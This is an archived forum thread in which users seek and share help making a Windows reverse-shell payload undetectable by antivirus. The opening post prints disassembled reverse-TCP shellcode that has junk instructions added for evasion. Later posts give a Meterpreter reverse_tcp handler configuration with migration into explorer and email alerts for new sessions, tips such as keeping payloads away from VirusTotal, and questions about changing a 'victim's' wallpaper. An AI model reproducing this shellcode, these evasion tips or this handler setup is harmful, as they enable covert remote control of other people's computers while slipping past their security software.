PDA

View Full Version : create a payload undetectable



Lancha
2013-06-05, 21:20
i have this assembly code of the payload but i can´t make undetectable

.section '.text' rwx
.entrypoint
entrypoint_0:
cld ; @0 fc
call sub_8fh ; @1 e889000000 x:sub_8fh
pushad ; @6 60
mov ebp, esp ; @7 89e5
xor edx, edx ; @9 31d2
mov edx, fs:[edx+30h] ; @0bh 648b5230 r4:segment_base_fs+30h
mov edx, [edx+0ch] ; @0fh 8b520c r4:unknown
mov edx, [edx+14h] ; @12h 8b5214 r4:unknown


// Xrefs: 8dh
loc_15h:
mov esi, [edx+28h] ; @15h 8b7228 r4:unknown
movzx ecx, word ptr [edx+26h] ; @18h 0fb74a26 r2:unknown
mov edi, ecx ; Move the contents of the ECX register into the EDI Register
push edi ; Push the EDI register onto the current stack frame
pop edi ; Pop it back off
mov edi, ecx ; Mov ECX back into edi
xor ecx, ecx ; Zero out the contents of the ECX register
mov ecx, edi ; Mov EDI back into ECX
xor edi, edi ; @1ch 31ff


// Xrefs: 2ch
loc_1eh:
xor eax, eax ; @1eh 31c0
lodsb ; @20h ac
cmp al, 61h ; @21h 3c61
jl loc_27h ; @23h 7c02 x:loc_27h

sub al, 20h ; @25h 2c20


// Xrefs: 23h
loc_27h:
ror edi, 0dh ; @27h c1cf0d
add edi, eax ; @2ah 01c7
loop loc_1eh ; @2ch e2f0 x:loc_1eh

push edx ; @2eh 52
push edi ; @2fh 57
mov edx, [edx+10h] ; @30h 8b5210 r4:unknown
mov eax, [edx+3ch] ; @33h 8b423c
add eax, edx ; @36h 01d0
mov eax, [eax+78h] ; @38h 8b4078
test eax, eax ; @3bh 85c0
jz loc_89h ; @3dh 744a x:loc_89h

add eax, edx ; @3fh 01d0
push eax ; @41h 50
mov ecx, [eax+18h] ; @42h 8b4818
mov ebx, [eax+20h] ; @45h 8b5820
add ebx, edx ; @48h 01d3


// Xrefs: 66h
loc_4ah:
jecxz loc_88h ; @4ah e33c x:loc_88h

dec ecx ; @4ch 49
mov esi, [ebx+4*ecx] ; @4dh 8b348b
add esi, edx ; @50h 01d6
xor edi, edi ; @52h 31ff


// Xrefs: 5eh
loc_54h:
xor eax, eax ; @54h 31c0
lodsb ; @56h ac
ror edi, 0dh ; @57h c1cf0d
add edi, eax ; @5ah 01c7
cmp al, ah ; @5ch 38e0
jnz loc_54h ; @5eh 75f4 x:loc_54h

add edi, [ebp-8] ; @60h 037df8
cmp edi, [ebp+24h] ; @63h 3b7d24
jnz loc_4ah ; @66h 75e2 x:loc_4ah

pop eax ; @68h 58
mov ebx, [eax+24h] ; @69h 8b5824
add ebx, edx ; @6ch 01d3
mov cx, [ebx+2*ecx] ; @6eh 668b0c4b
mov ebx, [eax+1ch] ; @72h 8b581c
add ebx, edx ; @75h 01d3
mov eax, [ebx+4*ecx] ; @77h 8b048b
add eax, edx ; @7ah 01d0
mov [esp+24h], eax ; @7ch 89442424
pop ebx ; @80h 5b
pop ebx ; @81h 5b
popad ; @82h 61
pop ecx ; @83h 59
pop edx ; @84h 5a
push ecx ; @85h 51
jmp eax ; @86h ffe0


// Xrefs: 4ah
loc_88h:
pop eax ; @88h 58


// Xrefs: 3dh
loc_89h:
pop edi ; @89h 5f
pop edx ; @8ah 5a
mov edx, [edx] ; @8bh 8b12 r4:unknown
jmp loc_15h ; @8dh eb86 x:loc_15h


// Xrefs: 1
sub_8fh:
// function binding: ebp -> dword ptr [esp], esp -> esp-10h
// function ends at 0a0h
pop ebp ; @8fh 5d
push 3233h ; @90h 6833320000
push 5f327377h ; @95h 687773325f
push esp ; @9ah 54
push 726774ch ; @9bh 684c772607
call ebp ; @0a0h ffd5 endsub sub_8fh noreturn
db 0b8h, 90h, 1, 0, 0, 29h, 0c4h, "TPh)", 80h, 6bh, 0 ; @0a2h
db 0ffh, 0d5h, "PPPP@P@Ph", 0eah, 0fh, 0dfh, 0e0h, 0ffh ; @0b0h
db 0d5h, 97h, 6ah, 5, 68h, 0c0h, 0a8h, 1, 84h, 68h, 2, 0, 1, 0bbh, 89h, 0e6h ; @0c0h
db 6ah, 10h, "VWh", 99h, 0a5h, 74h, 61h, 0ffh, 0d5h, 85h, 0c0h, 74h, 0ch, 0ffh ; @0d0h
db 4eh, 8, 75h, 0ech, 68h, 0f0h, 0b5h, 0a2h, 56h, 0ffh, 0d5h, 6ah, 0, 6ah, 4, 56h ; @0e0h
db 57h, 68h, 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 8bh, "6j@h", 0, 10h, 0 ; @0f0h
db 0, 56h, 6ah, 0, 68h, 58h, 0a4h, 53h, 0e5h, 0ffh, 0d5h, 93h, 53h, 6ah, 0, 56h ; @100h
db "SWh", 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 1, 0c3h, 29h, 0c6h, 85h, 0f6h, 75h ; @110h
db 0ech, 0c3h

0pt1k
2013-06-06, 15:59
This got past my Eset av/firewall: http://pastebin.com/7xmvGnks
You may need launch_and_migrate.rb for this one.

0pt1k

Lancha
2013-06-06, 21:05
i gonna try thanks i gonna see if pass by virustotal
greate job

atomixgray
2013-06-07, 17:07
Don't upload your payloads to VirusTotal! They will get patched...

Lancha
2013-06-08, 13:21
thanks for advice

Lancha
2013-07-06, 13:14
the script you give-me don´t avoid my avast detection in randon number i put like 20000 and the enconding 30 and the avast detect and remove automacly

Lancha
2013-11-28, 13:16
i find this plugin for mfs but i can´t put send the notification for mail mail address
the code is plugin
http://pastebin.com/KLU2cYAG
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 9091
set lhost 192.68.0.2
set AutoRunScript migrate -n explorer
load notify_mail
notify_mail_mailfrom taaaaa@gmail.com
notify_mail_mailto teeel@gmail.com
notify_mail_smtpsrv smtp.gmail.com
notify_mail_smtpport 587
notify_mail_save
exploit
e have the session but is not send-it to gmail account

zimmaro
2013-12-03, 09:37
i find this plugin for mfs but i can´t put send the notification for mail mail address
the code is plugin
http://pastebin.com/KLU2cYAG
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 9091
set lhost 192.68.0.2
set AutoRunScript migrate -n explorer
load notify_mail
notify_mail_mailfrom taaaaa@gmail.com
notify_mail_mailto teeel@gmail.com
notify_mail_smtpsrv smtp.gmail.com
notify_mail_smtpport 587
notify_mail_save
exploit
e have the session but is not send-it to gmail account


hi lancha :)
if this can help:
the port use 25
the server smtp use 127.0.0.1 (localhost)

use a default server MTA in kali EXIM4
configure your exim4-config AD HOC for gmail
update-exim4.conf
start "exim4-server" &&& ......worked fine!

http://imageshack.us/f/801/mcm2.png/
http://imageshack.us/f/513/z4cm.png/
@zoom 1600x1200
the links to help me for this:
http://appsparsi.blogspot.it/2011/01/configurare-exim4-per-mandare-la-posta.html

sorry but is in ""italian-language"" try to translate
bye

Lancha
2013-12-03, 15:29
thanks
work
i find the script to change the walpaper of the victiam but when i make load walpaper i have this error
Failed to load plugin from /opt/metasploit/apps/pro/msf3/plugins/walpaper: undefined local variable or method `client' for main:Object
the link for script
http://pastebin.com/yPJqCpRy

zimmaro
2013-12-04, 21:21
thanks
work
i find the script to change the walpaper of the victiam but when i make load walpaper i have this error
Failed to load plugin from /opt/metasploit/apps/pro/msf3/plugins/walpaper: undefined local variable or method `client' for main:Object
the link for script
http://pastebin.com/yPJqCpRy

hi lancha :)
maybe we're off topic :o:rolleyes:
however:
the old & dear wallpaper.rb is a ""Meterpreter-script"" then be copied on /opt/metasploit/apps/pro/msf3/scripts/meterpreter/ directory
&&
the ""wallpaper-background".bmp(es:metasploit.bmp) then be copied on /opt/metasploit/apps/pro/msf3/data/ directory
....seems to worked fine!!
http://imageshack.us/f/19/g8qs.png/
http://imageshack.us/f/41/ju9z.png/
@zoom 1600x1200
bye:D

Lancha
2013-12-05, 18:08
thanks for the help

Lancha
2014-01-31, 16:47
my avast detect the payload with launch_and_migrate.rb
can someone help-me
i using avast last version
with windows xp SP3